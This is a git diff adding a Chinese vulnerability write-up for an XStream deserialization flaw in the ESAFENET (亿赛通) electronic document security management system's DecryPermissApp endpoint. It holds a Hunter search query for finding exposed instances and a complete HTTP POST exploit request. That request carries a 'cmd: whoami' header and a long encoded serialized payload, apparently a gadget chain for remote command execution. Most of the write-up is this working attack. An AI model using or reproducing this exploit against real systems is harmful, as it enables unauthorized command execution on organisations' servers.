+![1706604015628-e224ba21-5cb3-40a0-bafa-0cf38e6ee1a8.png](./img/hzfoaEiaCAHdMefm/1706604015628-e224ba21-5cb3-40a0-bafa-0cf38e6ee1a8-466737.png)
+
+
+
+> 更新: 2024-04-20 22:01:34  
+> 原文: <https://www.yuque.com/xiaokp7/ocvun2/tmuiit7o4r6wbx09>
\ No newline at end of file
diff --git a/亿赛通电子文档安全管理系统DecryPermissApp存在xstream反序列化漏洞.md b/亿赛通电子文档安全管理系统DecryPermissApp存在xstream反序列化漏洞.md
new file mode 100644
index 0000000..4e7f06a
--- /dev/null
+++ b/亿赛通电子文档安全管理系统DecryPermissApp存在xstream反序列化漏洞.md
@@ -0,0 +1,36 @@
+# 亿赛通电子文档安全管理系统DecryPermissApp存在xstream 反序列化漏洞
+
+# 一、漏洞简介
+  亿赛通文档安全管理系统是国内最早基于文件过滤驱动技术的文档加解密产品，保护范围涵盖终端电脑（Windows、Mac、Linux系统平台）、智能终端（Android、IOS）及各类应用系统（OA、知识管理、文档管理、项目管理、PDM等）。亿赛通电子文档安全管理系统DecryPermissApp存在xstream 反序列化漏洞
+
+# 二、影响版本
++ 亿赛通电子文档安全管理系统
+
+# 三、资产测绘
++ hunter`app.name="ESAFENET 亿赛通文档安全管理系统"`
++ 登录页面
+
+![1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6.png](./img/Fv6jdjorzsAlhpvz/1693912211487-1ee3eb84-62a3-4c32-806a-6be32537dfb6-150931.png)
+
+# 四、漏洞复现
+```plain
+POST /CDGServer3/DecryPermissApp HTTP/1.1
+Accept: */*
+User-Agent: Mozilla/5.0
+Connection: close
+Accept-Encoding: gzip, deflate, br
+Accept-Language: zh-CN,zh;q=0.8
+Content-Type: text/xml
+Host: 192.168.110.187:8090
+cmd: whoami
+Content-Length: 14756
+
+NNLINELBIIKEOGPIFLNMHIPNNOHFNECLEHKBCIHIFHCMONPDPHOHMONIOCNLPBOKNAEEBHFCIFNMDPDAACABKCKIAEMBPOIBGPMNEIPJAOGBILDKMLDGAENLPAFBKFPFELKLGCEBMBMNKOIBMPHCIODCCEHOKPCEDHPNLONIODEGNCPIGDFMGMDPOMMEDIJNFKDCHHBFMFGBDOIOAHLOHNAMDBJABECIJOEHKAPJCBDIDJHKAMAGEELEHJEEIDBDILILANAKCIIGLMDIDDMOPNCNGLPPOMMIGCEFEBIMDHFAGLHIDHPJCHAEHFPHNHJGJKJDCINLAHOAPCDJNIABODKBFABJMFIEMLLPGGKNNNFCAOBHCOEOHCBFOFGBBPLKPHLLNOCJAKJDJPOEPBEKKPHOPBHFLJLNOGLABIJHIBOFFCPCLPAGLCEAONCAGIJFAEFOLKOLENHNFBOJIAOFJKBFMGNKBEECKKJPCECMFKPPPKEGOIOBHIBIBAGBIKAMOFLEKDKODMHGJOCEPEBNIHPFKEKKMCENNPHEODFNIOPMHFPPNFFIJEEJPPIMGPKHDOACKEEJACLCOKIPFHHECFDFJNMIFNGHLCOFLPDACOOALCNKBOEBPNPCKCKNJJJJANLFPKGLOINAIODAJNHAEDLBNONDJHPFELIJMNLMHEMBFGOHELCDBFHIFALDIIMBFEOHNHBOIOMLCJKCPHJPNDLPHDDCFJNMGKDMEINHIDLEGMOCNAFDAHOMPPIFFBPFCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMBJDGIDJMMGEOEGJNJDNNEKFDMEAHMILDKIFBGKGEJCMGOFEKGJEMNAFLDGEEOBKOHADBAMHBMDJOGIFPMDKIILIGAEELNEOAKNEFHDOGHOPBDICEALJIENFKHFCEHMPBJLCFPDHDGBBFIMKHLLFIHONFDJAIEJJLPPFMAEHBHDEBOIDLCMCIKAFBEBFEBGJEECDEINCPNPKIENONIMPBJCCMCHOAJHHDKDKEGJGDGJDJIDEHNNLNNHEONJEJHNLHLPMBBEJDLLJLLNPKIMGHLOFMMKBDEBHNFLPGEOKMHOFNBLLAALGMKNJONNGIOJLBFECJNLKHMBCKELDPBDMBFEHAKBHEMNDFBBEDCAMMHNNGMDGLNJHJDAGPILNGBEDCDJBCJOAMOBIFLOFCFIJKDELPPFLFBOHHNIBEGOOFEFGAENOKBMPCBDELFJPAHICDPGANJALHFENMFHAJLNECAEGOGCBOIDLJENHCEDMAOEEOFKLDEBJEJOBCFLPEIEAGPOILBEGOKPOAAPGMICFMFLJNDMBGAJJPKNLIBOAABJLNADADNALIKHDJMDKGOPELEHGPDGNJHAAJKICHBFGMHCLEPFHCCKNFKPEOMHPLMOHBGDHCOGEIGPMIGLAHKBCEDHFGLDIKIIIMEPHMIMCIGJJDCKIEODLKCKOLAKBFHIBHOPNAMPEIKHCMDPNMLACKHOGJAEMBJPFEBOCPBGGAFGGNCOBEAIPANPLIBGDCCNMDNDNOIPOECCPELCEDPGCNJHEIOIFPJDKIFNJGHAHLHFNPICIJLHELMODMJIEGMMBNMMFBEJCDDDFOPAJOMBNKBDBGKKMLKCBBPFOOJCKFFIMLCODLOFNOIEHENLJNOFDAMKFLHIADBNGANHIANHOCHLILNJLOCOHFHMNFHALJHOPGKLOPHLMELJFBIABENFKEHCLIKMFGHPPJFIBBANPIOFKEEBIFIBDIIAIKENFILIDPDELJDMOPFKBOHPGLIPMNCFJFDCJGKCFOAJMPIIBEOHJPPNHLOCINIECHMJJMCKHICOMIMLHJAOJIGIFLMINANOFADOGDLLHCEKPECHDFBGIPEPNJBJOGLHDLKFLBFPLPFAENMMIFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBNEAKOAMMEHPGCBAJCHDBGJANBBHGIBMPHAMCEHEFLBAGOKDPKIPPDFLJIADKKOJPEPIGAKPCGKBNFBPLLKLEGBPJJCDJFGHDMLPNJBGFMLGMCABONHBLHPKHKEGJIBPFKCLMBIKKOMINPAJEPFHANBIBKMPHKEODCBMMIGAEFCENBNKDONGNLBADGDLJBMJGKEMNJOMPHDOPALIGEPCEDDAHJMNMJBFLIPBODEDCDAPMNGCANOCPLLMJOCPMPJDMEAMEPELICJKJLODAJEILBOJNFAJOFNOGCHGOJEGMGCPNCDEECKPAIAOHCLJBBFDKKAIHOJEKDBOFMFOBEDLNGJNIAJPLGMHBLHODIKDLEPOINDPDDIGKOLGEOBFFPMOHLBEALFIGAKNDKEKEJMJLNGHNANLCGLPNLBBFNKNEKCGBJKJDABFNAGPDILHBAAIECKBLKEDIJIMPJOMFLHBMOBLEKNEHINHAKBOHICLGBBPIEJIKALMIJHKHFIDNICAEEFPGGPBCBFPOJDFFKAGKAEOOCPMGCCMHPCIKHCODDCNGDDNDLAIMAPEMPNECNFPIALJELGOIHECEKHBHOHNIFCBJBFAOKKDCMNHHINAFGNECFPOGHBNMPJOECCFOCHICANBDOCCELJCENBMIMBKCNJAEMBHLOJOGALHGLLOEBFGFJAOFJHEGNLCEBCHGLNFEEIDOKIJNDHDANFPGLEMHOIJHOOJGKLGHBFBMBPBKEFOAKAIAGDMBLDEKLFKADKHNPAKBNPDKFIOAMAKKEHFNDABEPGKBMFCDFFOCIPDDEBOBFONDJFAJIJBAMGNBMCMJODGEGKIMIOLLAKMKJJAOCEMOBDCODALCKGKKKIADHOFMLNDGJBEMLLJPJOKPAIDACMPCOKAGKLIIMDENPNMEIBBMIFHGJKLKGPNOBJGMMLDKFKALLFHFDGDBDBMPOPDBLDNMAALEMAHGINFECKFHKJHFOCDJNBEDNGJCNENGIDHBJOLHEPFLEPHOOGJKFEGFLEMLGKDOOKIMAJIBJKOLAKCHBJJFDIGEMPABDNJFGMDAGEDIOHJKOAEHPLIBOFLIMFIEFOOGDHDNLCKOKPEDKEEBPAHKFMKBNNBAMICPOPLNPIGLMPDLAFBIEPHPJBFLBDECCPFINEBGMPMECAICGFLMJEKEIKDOKJMOAJLFNHHEHEPDAMFLNPKCDPODPLMFFAMILMAFIDBDJJOKIJKGJACMOMEHDDCJJAAOAFJDCCEFHKMJNDJEOLOOIHCFIILOIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKEDPBJAKIPHPKELOMHNFABNMIMODOGPBOFLLPBGAHCEOBBFJLKNAMKACHIOMMFLAPFJCHBIJAAEJELEFFEIMAMCACJBBGADJDJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIKNBGDCJJCPMABJINOGLAPAHGLJLADBJKFLNAAFKFOBIJKCFIDEKNFGFCHDPGLKFDKPPHPNCFIGAMHBNHMLJAHOKKFLNOCNDNPPJJHBBKHDIIENFAGAHOMFPNNBGDLDEHLBDOKEOAEFPPCIEPGIOAHDEEMIKDPHBMADGLNILDCIEKELEBBEOBKLCDLKLKLLKHDHBHGDDLHOHGPPANCDABBHHBDOOLEOAKBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIGOGDKMBIAMJNNOOFGCNHBCCCFKCAOFDDDCBPLMMHGBLEDOPNEHBOECJGFMFOEIEIFAHLCOOAOLBFFKHAHIEMAEOBBPMBJNDMJJDMNJEMBGMNEPCFODGCOCKJICOBEGAFJKFADJOFMGPILCDMBFLLLAHEKPBCDJEBMHDLBLDLLCIAGNJJBFHFOIPLNNOFAFNOMFPBPNFLPLFFNNBBNEPBHBKJEOHBJPMOHHEKFHGACPFPDAHPCAPPGPKBJBGGNIPLOHFPAPHLHCJJHNGNKOMDMIECKACEPHCFJJAIPLCEOFNLBAFGFLBLNBPAHBOOJOKHIBAJFEAEKBNHHODNJNMEONLHDIPPCJJAEKOOELNHPDPAEPPBILHLHELMDHGPJMILIEOFJHBIJHAIPPKCIJKKANAAKEDNDAILJPGJLIBJMABMPDMHGPNALCCAIIAMJMFGJDOIPEFEBMMOBABIKBMMHMFHLBEFFLAGJLNMDEAOALFJGOGNFMFEFKPMNCNNEFMJNADLNIILEGKLOOHMBHPJJCNFBPKIKMAIEIANCNDLOODENILDEJELHACIBBOCINOOFNPMINIFDEFMPBNDMFGHJHNKCKDECBJIBFMIMBGFCIHDJAKCPNAPNMOIKJIDLPJCIKNOGJDBALIDJPCNICIAIPNGPCLDBGPIFLGDPNDOODLHJPLHFILLLKDJHHDIBODNIPFLCAKAFMGCAAMKOEOPLJAAAPDAHJAJHIHGPDFLNALHAPHIOBEDFICNIHJLFALHJKNLFLBKIHIFNAIIFBILLNOAIOKFMLEPDIKMHGNMDLKBIEGLFHDNPPDFPEDPGOLPICMJPOFEAJJMHGKPJEJNEMJGIPKBDHEGLILBLJIEICMNINFCHAOGJNMIHPAOJCCFNJHGJCJEMJJPCNFDKKGDJCDFBPGNKGDMPEBIIMLMBBAOGBOPAEFOMIHEJCKJGBLFFOGNGOFPPJEFNPLFPOGPICGIKMGPNIKNOELEMAGNHKHOIKAILJBMJJIPABBGPICCMPNFPHHFHKDAHJKBMAHDBKLAJKPJFHOICCDFKJEDGGFDKPGJLKFJJJKCOANLNPDEJLHBBHJJGMNJPHFCHGINMJIMBDCBCDOHKDANDLFDOOCEADNHODFKGLBGAPAAONECAEACNDKGFGIMDAAKMLJJLAGKCJDECINGDJAHONECBMFDKMCKHOKADAPGBOKOGPEDFMHKFBDEBOMKNMELIALJHOHGOCAMKJCFECMNCODNHGIFBFIIJMPEHGNBDNGHICBLIGCOPDHENDDEODNJAJJFHNJIBJGJPFFKPBFOBDLLOIBAHALODFMHODOHOPGPMGLIPIJONOFCGMELPFMKMMCPFFNMILJFONAACCBCIJFCAFHOHLBALEIGHDPMMFMFIHKJBAGGGBDEDNCDHEJALEBDPIIEGCKGKMPLGKJGEJAJPMIFCDBAELNMDPNKFCAEGJCAFJPJBBMPLMEIGCNPOLIGHCLGMEJLKCHEPGBJCCDECFMKIBLFIGOFEJKPGAHIGOHNOKMLOHLKDIPAPMFOPBHDBMAAEBEOKBEMEHIILJENNPKHJIMJMNLGHMAENHOHGMEFLKPJJBHDGLGAAMIGDMDCHBMICMDKNGPCOPEKDEMFLKINAMOKNDLDBABNGLFPJHFMKMBBCAEJDENPHGJGGPLMIIHHIAHGIBOINFBNCKJLJIGEPNAOGJFAFPDDBHEBCKNNJKJDLBPHHDNNCEDGAKHGOKPMCLOOPIHHNFMNFOILEAOIFGOJGPDCBLNGLEIOHHHAJPFPGLJNFFHKCNMFGHAHANBJLHJFNNLIBEIFKHJHMENIIOONPDMFOCPKEDHHMEPHAJKGALDFDBOFKBOCDDAFLJBDIENKOHGJPHGLOPDMIEPDBHBBEILLFPOAKJKJAPFKAOMLFOJBLAAEAIFLBOMGECGDBILGNGBEHDEOFLOLHJKAOJMJKNNLKNDHAPCKCHLAFHMCCLNNIIGJLDLCCOALPEPPNEBDNPGEMMPFFALFDONIGHJEMJGJGPLKDKMBGCLJEPLHDBOIKMNGELEKLJLFFAEEEDMBJFLJGGHMPHADEJEJLKJCMLNFIELFBOKAOPCIMCEBFNGMECGFAMMNOMCHKEIJGGNIHKPBFJLKODLLABGBJANDJFBJNBDHIDNGJGLAOFHGFBMJAFJNNLKNBAALOGIIHFMIOLDOEEFNNJDFLIMNBAHJGPJBDHIKGHCDMMLKFOHOJFLOLHHCEJACKLGHIBJHJHGMECCLNHBDGHFNPNOFEJKKOMEFONNBANBKOLDEMFCMDLNLGDBFEOIKAFJDAHAEJHMIJGJFAOJIHAIBHOOEMHHCOODAIEOEBFLMNAMDIIDLDHAIJDBKCMGKJFHHFKKGABCJCPHBBKDBPGLKFFFFOBLBHAPEELFFDEPOFFHIINLEMPICLDNGAEELNGONJIKOPFIJBJIPDGPLEDMHNJJHLBJDDGNDIHECEJNEFNLEHNHFCFOEEEGFIOKCPENDLNJJHGFJGAMNFLNFFIMPGKEMKKAMEPBAHBKBHGGIEANHFOKPEDDNLADKABNLJPONGDIGMCLENLOBAKMEPODENJNNDPEOCCLMLOJDJPPPMEFLBFLAIDHNCCHDDONIDPMKIOAGODDPKHDBGFCIGOAFLPBMELEPDHECABPOFMOKJECEHKIJIKHLCEFMAIGEKAALLCMMCDLPHELOCEDNIAIIHJCGFHJFBBKFKCFOBAABJEIMEIMDPEPCHKEBCEMIPECMAJGCEKHGOKOGFNHHFMKOICKKBKKKBDGDPCGLGMGALDDMEEFILPFOCFHFGIPOHKADHACFDJCGCKPANCHDAEDMNIEACGEECCNIBJGGIENIOENAFDBNMJCPJDDDKGDLKMCILLIEKBEDADHHCMONHBAABOGHMPNGHHEHIHCBBJJINCFFJKKEHMGJCPCNIMKCPGHBPIFADBGGBPCIMBDPENPCFFFPDGMKEBPFOOFFBHCKPAGHGJJELHDFJBCKLMAJDCJIIILHKBHJJMKOAOMLFOJBLAAEAIFLBOMGECGDBILGNGBELIMDAFIFCBLHDHLCJLMAHCOKGMKDCLKKOGKKNDDAHMGGIAKGHAHPNADHLLPPFDJILKFMIHHPIMLOGMDHPFJHPMGEBKHGHLFDKPIKNDKFLBNHOODBEAHNBBDBALEJGOLJHFPKEIHMLKAJHBNICKMPHFANCLPNFFLDDHEKKOLODMEJOIJGPDOPCGDPKLNDLPBHFGIMJCPMLPCPNPCJCKNJBCJOJIJCHDGIDIIJGKMKAICADENFOEEGHJNEHADCHNEMABINOIIGAGNGNPNCPALKIADLLJBEMOKJEGPNELELFGCIFOMAFBPCAKEDHIGLMFPFIHGLFPIHFAOFBEIIDHKDCGIGPNOICHCLEAKLHILHDCONAKMNHALCLFLNOBIMBCMKNGHPIHGDEIGGILLNIHDPACAJGHBEBEBMIDAOCAAKGMNBCBENBLGLLLOKMDMJANECALMLPLJNKGJKBLCIPBJBPMJOHNPOBPOBCGEMKBPJABNDBKCGAFALLDPJHHGMOGDJDNEKGJBMEIBPIJIOLDOPCEDKDPACBAAMDFLLJMFEGLKICDEMPCHMHIDFKFKDCMGGALJOLJEMCGHMKIMJPOEFPGECHMGBLGGGBJEHBDGGAJEALPEDHDGJPPFLLAHGGKAPCNJCIFBLMGGCKOJLHCHOIMMGEADLOPOPLIHPEPBAHNKNAKOFIMOBBJIBBHMFDNDAIIFMLPLABGGJEDHELLDPGHIGOECAEMDJBGHODPCNEDENIFPEHAMJDPDEMNJOACCBGPPEILNOKDFHCNGKANGBCDCDNGEIBMJODCBPJNGKLECPCHDHJEEDHNFJEKGLMAFKCMKAMJPDMJLBGLPEJLLHINCGOCOENMLDKLDLHIDAHBBINIEFLIFGBJGMGMDOJDLFNMAJDPIFGICFKKIECPIPHHBMAJJGNBPCKCOIMIOODGNDMKKMLKFIDHKBFGDHLGANLCJCDEMNPGCGPIPNEMIKDJJNKECHEJMCNAGDJNGIFFDPFGMAKLPLPLMOEDIEIOIIKMFLNDFDHCJHENMMAAJOFJLGDIAHBOCLMAGLPKKJAJGFPDCBJPGNAAMNGNNFDHDPIEHFFEPPJOMADEBHBIGFNOKHDKDNAIAAKLIGFNIFDKFMLJANODMADILHHONCGNLNJEKKAJHPMIDGHNJJOAGGFNKCOCONGBKNDNIJOLBGLGPLAKGCDIKIBNPMOACDBJLDLCNDCKFOJKINIIPBNBDHMNDEILFFCBIEMNMHCACEDFAHNMJLDEFGMJIINCJDNOHLDJIDOKKPCCENOHBDNMCGEHGENDBBBHFOFIAFGGCNKOKLMMCOOHNJEAJKILLKFJCEKEEDJHBGIMKLOEANBKMBFLDAGGOAIHNLDOPBPCHGNIDHGKFAMFGKBIIENFMJLHCGEMBKNJPMKDFCJCHFOLNOIPADHBEPLLHMNGEBMBHNLBHPIGHGPGKCPFOEGAHJKPIPGGMPIGNBDDIHKCLOFKIBBBHNPBNCLFGCHPOMIENELILEJPLKAHBJEPICAGJMNOAAOJLMPDBOOMEOFFAMKILAJANPCKENJMKLFKMBGOKBNKFGEGAEPEANNCIEENEBEBECBGLOKHEJCFCKABBAAMCDKCIMJLILOAEKHNKPCGOLDBBFFIGDHPDHOFNMLANMCHBIEHHIBHOPPLOFEGOAJLHCHPHGKLOCGJKKABNHLEHGKOINGEDMGDMCKKKLABBIOJCGANBDOCCELJCENBMIMBKCNJAEMBHLOJOGFLKJCNMEPJPKGKPHDGHIDCKAODGNNNCDKEDHLCIANLKENHMMDELDNBPNNNPHLGDDOLGDFPHOHFPBKMFEGOLFMMAFCNCDLMEKPKCDJNHIOJOOJADDHHHPPLGLMINICBIOEIALHBBCEGACCNDNOAPGNAGELEPGCBGLAEOPFGGIJBAKDFCPCCGJAHBDAJEPBCFMNJIKADAACMEFNBCBKICAALEICBCKEKHPCPDAKMDPGNCBBNKDFICFKKJEGOEJELPGLECFINPMBCCDLIGEJJALHPNHDAMIFEGJOCFGFDGBNJKHKAMOKOKKLIFIBAFAELPAPCHFFEOEBNFMLGPPMCDHDIIABOBFDCPFOMMNCJGJJFPGFHOKMAGCEOCKMJJPPAFBDLODOABMLPLAMCJIFGJNHALNOJMBLCFJFCDNCHLBGHLCAOICIJGDLGDMEKPHHMBOHAJJGMAIGLPIEIHHLKDOMBJMOPJIKBAKDHBBJLJJNPOHIDBAFAGMBLLPIEHENEMHNIFAGMMELMAJHCLFCDNFKHGEJFGGEIBKPFAFHFOFHGMCLLGCAJDGGJNKFBGDAAEAJNGEOJBBIFLLKNJIOJNHCFKPAPHGABENLMABGDMFOEEKIMHOBPCLPEAGNBFHEOMLGDDLDCODAJIEIPJNHJFDPHILIKHMHJHBJBLPNPPPJOJJBDJHCPOCLBIBBPJLLMNKIOKPHOFJKEJAMOBGCHOONMPJNEGDMNFPKMNOIOMJPEPDNKBODKFCDGJMGBCNHIGHFODOJAHDAFEDKOGGLMEJCOACLPIMCMPLDKDAPFJGGECGPNCEDGAEMJADOCGBEFIIPBMJMMMPNHNAKJOBMOIMMOMEBOBHPPIPAHJHKMJADIIDCIGOMDJBJHMHCGFJLELPFOMAFEAPHLHCCKKNNJMMLKIJEBGEBEDOOLIFHLKHCOONJMHCAFGOKNOAAKONAAPPMONFOJENLNEPGBJKLEHIGBDOAIDKAILCHIFPPGGFLGCPINADFPDCGMIHHIPHBCPIPHKGMGBPEICLDADONHGOFMMAMLAAHHMBIGNNOENIOJLMNGNMMKCNGEKEHLJHHCDFJKMDOGMOLHIEHDOCNBPILJOFBNCDONBOIHDDLALGCLOBNAFBDHNPEJJODIENCOCKHGOHOOLHFNDOFAEPCHOJNFJJNHKAIBGJEGDBHDFJGHGEPIAGPJBCCCAKMHIFDDNEDMCAOBCCGOHCMMADMKHCKIACBMGFKOGDNFGIGBJFFFKJFNIJAPHIMHKOLLIECAJFNFLJLLHEBIBLIOBOEIMNJMIJOCHEBEKPDJOCCMGGEOKGOMOFPKAICOHBGBOEFIIIAJKPEIIGBGLJCCAHJNKJFILFICJCPAICDGOBJIHMEOJHLCNJBDIEHHNDGKMKLLDLMAJLOHECBFJEOHKCABKIHGEBNMAGAODODMAOMOBILIIGCDKPJOKLAFLJLENBFFNNAKANMKNKNBNOJBKEKODPBIDDCELHBDDHCKEELKFLEHCNEFIAOJJHHHKIAGDJJGNKODKIGJAGBFEBMDEOMCHILDNFEEPFOGPPAHEHACDCHDOIDELKKBLAOJACMGMIDOJIJLPAOCLLIIFPLJDKCOEIOPBEAHBLGNHJHPLNMFFMKEHLOPIGNFNJNGIEPNELLHMIIGNPODEDCIHCIJBNMENKGFNOMILCBMELHLHNOBFLJHDIFLHPCKEAGJJNEAOBPNGKECFLDPPMCCLMNMHFICELDKEFNPMJHNGOKLOBHONELNCPLNDFKOIJONIBBBGABIANBIHHJDDLACPJEENOHCCDIJAPBKNNOECPIGOIMNMMPOGNCEOGDKNCCBHEEJCLEFMBEMEJICLGNHNIPEIOIAPKJDGOIKGEBGODFIGCHKCFFLPGFJBKDJOIMEJEHEEAOOJGLGKKDHGCIGFFOPILPFENMOKOMJLODFBNKOFEJKICAMBGPCPDNJOJDALNGCOFDAINHOAMCNLIIJEJENKBHFDAOFAAPJKBONHBMGGKAEMGHNJPCJFBDCKICEIELCGDJKIDFAKAFEHEBOMOBOGFDNEAANCAINACLGFMMFOMGCCBNLDCCPGLKNCABNEDFIGKDJHAEJIOOACADPENHDNOOKPILJCLNGMIIOPICHFPACILNJNAIEILINONKDMONACMLIKHOMPLHAODMDPFDNNKDMPMFEIMBOIMLOLCBBGOKONLDJCDDHGHIIIHDOLIJMGPFKMMPBDDPBIKJIBPKDNHOAHEFENPMKBLHOCDKLCKIMAOFHOEDNHKFNKKGHCICLAFKOBANHOIHACPLPLBCEJFONFMMGKINEPMEAANNFKCFODBDNAOIDMEFBLPBAIABHFJBNGMIKCJFGLPEHNDJHMGKFPPGEAFHEBFACNBIGGEIKCPBGIKHHNEAEMOAKKEMFKHDEBEGDDGJJLCIIICMNIDNMBIKHIDLJNCOHFENHIFNKJEECDNLHMPGPGMJMGJIJHDBFECNLMLFCLDFOMCFNBJELHJFFLDKGNOIHKEIFCBPOPCBGIJENFHKCNKOJMFBFIPFGBLFJCFPFNOCKGAADPFFEJFDNKGFMEILHBFMAFBMBOFNDGOMCGNIGJGOBPEOBPEKGPMMEMHLHMMCNDCDFPMACNDELNHGCALNPHHNFFLNAKEEEELCDLHDHBFOJBJFHBOJNBGEOLIACBICKNMEEGPBEKIBEEMKGKLDAKAALKOBBJIGECCKHILNGKJLKGJBOPOFHCNHBKFPHLLLLMNNKPJADFGMCMPLILPCLOLJPOCIOOPOAPPMPFOEPNFGEEDALHLEIHJFAIHCFKLJKCBAABOIBBEAGAAPJJIHIHIACHLKBCPMEHCDGDPKPMALDBADOEKFMDFGAPPGNNJDAMPMNBAEHLLGIGCOLKJPGANBJODFEMFHHDAIMFNNIAEAKLKBBEEADPHIDIINDABGNKNOODAGKLPGAIOIFJLONMCNGOMOEALKIIJFLAHEDDNHDENODGINCAGDBFAAECFCNPBBOBBIALOHDOIOMMMJCAHMEFMAGNLALDIPAJPHLOKCHJGGLGEHFJKMDEAHEGABCCMCFOBFCMGGKGBCCBPJIJJNHNAPPECAPJEHMDMOLFIEOIFOFFGKCFCNFAKAPGBMEBJGIDLDBNHOLJGLOKOOKCNHGLNEGNBKHFDOJINFAPPKMMOJCOCENEHPCGDNKKOJFPBNFHIDDHFPHMCOAOKMOPHJNOJCFOJJGOOLNCKAHBFDPIDMJGKBHHEAIOKPJEAJJCNJFMMCKHJANGDEIHKHBAAFJCJGGECNBIBNLBLFMBGDJGHJDPMBIMPJLLBNNANCJJHBJBLEPGNIJOLGJLCGEJKNGBLDLGKMIOANJGGDPHHCGHLENGJHBANCELNLNNBADCDDCDOENGLFGIEBCMHPFBLOIDMDNBCAMFMCMMKCDKPOFBJFBGCMPOFAPCILIPFJDEDDAGKFMHBBEHIHOAGDKPONBOADJEIKKBPNBAPDNOEEEFONAMIFBLIHLLKOLEFHKPPKONJOCFHFOAPIJGMHKPHGIMBGOBOAOCGLMGDLIOPIJKFJIPCHAJEGJFCPOBLAEDFFGIMKEIPDBKNCKIHFHCIHDFACJMOGHMONMPPDKODNGCOBFMKBBMIEFGHOKOMDADNGANEMKDFLNMCABMOONIFKFEGDLJFAHLOODEBNBKFGPLANHIJFFDLBFJDCJHMPCPHBDPFICAJHCBBKLNLGEPHMCGKEKOLJBIIAMLMCFBIGACEHBBLHAIBBODKEDBPKPADPBJIKCGFCKDHPKCGELAMHIFEBBICMAGHPDCIIAJMBKCFMHJDHIPNNHFJILAIBPKKGLOEONLBLJGCIMHKAJCAHCNNDBDEJNDGFNMEJJECPFIONGEMLMOPEDNJDFBAHAEBOKMCNEMBEOMFIFCKLEKNLJOAINFFJLKPGPLHJMAOMLFLGDPBCIIPPPOHNMKOKPGEMFEOLDEHEJMPIOIAODDNJOFGLHNDAJICAOFOJKDDFBMMJJEIAPPNDBAKMJIIGNHJOPHKPINANLLLBBIGNIKKHDLKLJGOPKHGHICEACMCJNMMDJGBNACEOFNBDNKAKIOMHPECJEELPLNGPGMPHCOJGOFBENNNKIEKOJHKDAFGBAKHGILNJMMOKHDMIDIOGGKPFIFJOLIDDEGFCLKGNICGHJOINJCBOPOBKNAIDEEAGGLCMCEGPGEDPNFIKEADDPPINJIOMFKGCMJHDHLGMODMMGCNEIGNGGEMLLABHCCHGGDPGHJFBJMCCFGJCLCFCDJEBFMDMIEDBFJPKLONGIHJABFOGBAALJKCADCBOMDFAHLBPIJEFGLGOGPEAFAKFJCALDHMICDCIHPICLPEANCLCBKOIAMEHHLFIJHPEACFCPDDKCJHMNDBHEHLHBHHPEEACDMICBKGDHODHPCMLAMHOEJKAOODJCIPGMOCGPOAFJDDLGCENAKAFDBDEOKAGLBHJHEJEHCCJEFMIFNJDPDFNFFPAOLIHNFLJDDECGLCJNEEACCJDHPKOIJMOJOPDOKIGOPKMOHHPNOLCDHMOOFDKKBCBEPJPFJBDOEJBCODALFBPMGFPHEMFIBCBEMCANBOMOAKAIGFHJAKKGGAMDPDFMHEEDFHOHKABHBEJFEGAEIPMBPBIHIABBILCOGDCPKHJIPBLCLJEENPKOJLHMALCEKELIPFFLJNNBINAPPOFHPEJDNNILKCEECPJIGJMKEJCNPEKJMDKPLLEHDDIGKKEDEPFHIJKKPNBBAJAMKNMNHIJFHBCKPKAKMAKCHMJJPFMFCFBKJMMEBABPCGCOCNKBJJPLMPHPJFLJLDABHNFFBOIGNCOFHBMFKCKMMENEJCPDOBPMAIDHBNKIAIGKAAHDCAIBLBKPNNLBNMEDCCOBGMDMAHJPPENANOCILDNELHNCIEAOMGKLMCLLEDDPNLDJNBFPEJOKCNNCJHKAPOCGFGENACAGBNBDEIAMGCCGKDNOLNKOCNMMABOMGGKGOFFOLKALPKFNMJJMEMMBBIAAFAAFPIBBDLOENGFIJJAFHNKKIDCGJNIGAFPCPDHPJAKCEKCCKDAIEDJCIJGMJJLEOEDELMJJMEJCCNEIMPDKIALLHFJNNGHOMIJIDPOCLOMECDFMEPAGLKNKEAPKHCBCFDINJHAGJAGPCGEJJEFAABLOEHMDIIGNKKDIILLFGPMBOIKEAAAJGPJHFGAFFPFEPKIKLKBMKLODNLBMFIEFPGAGFPCDCPJACDAEHCFOGEJHHLLBLBBDDOEEJJBPPHDCCOGPOPFOPCFJKBGCNCLLHNAJKIKLHKKIJLAIKBHCMBODNCPCLNHDLMHDPNKGIBANJJHCFLIMKPFOAIEDBDMIBEEPIHODEOLGAJHBNEOGCKIBMGIMJKLAOFAIACFJGOFEIBIOOPDCDCNFIOGCDKEGHEIAOBDCKLLGMEOEKIEHCEBFKAGOLFGCMNLNMJCNJMDBHMDPEGHHFKOJDDAPPHJMBLBDODOHKPNABBMBHMCCMKINKJLCIFBIPCENLPLOFOAJPEFHCDEOGLGFHNOBFFLHDMHNEFAIPMBJJMIIDAEAJAKGDIHIOIPIOPBJKOLEHJLBIOLGLBMHNCNDAHOGDOILIJANBPNLPPKCOKJFJPCLFJPGKDCBMGEOGGGANMMKDILOMJJLPKJJCOPFKPFAHNAIMDOKPCIKNEMFGMGCOGGMKBIBDEKDAKBPBJKPAFGODBFLGADBFNMDAHGLDGNFLLBONBDLAAOIIICMHIPDJCMHBGLFJAIMIBHABENMJOEHJLKGIIJDBBEHFJCHAPPIDAIAILKODLCALBBJNPCGLPKIEOLEOMKEMBLMLBEGKNGCOKOFIPBCFAAHGCIMCAKFFLFIBDHCDFHMKKNDHLCGIMMNKMGOPFDMJHCMOGLKPICOEEDDKPAHLEGOMDMDFLKFECCPILAKGLGDEMGMGEPODAGGJPPNDCHOBPHJKBDAKECOBIOJGKDMBKDBFPEGIGNOBDGELAENFFLCBKHHJADGFGCBAINLJPDMOBGLNNHAOBHGLGMMLDHGINFFOLLALGGAADPGMNJDMNOLKINDIKKIHJKDEKFAJDHPHNGAIBGNAODMICFEFCCHDPGMLJOGIJCIOOMMGEKPILGPFJOCMKILLFGPEAIBIDBGNPPDHLLAHMKLEJBJFBFPFBDNEJCNPK
+```
+
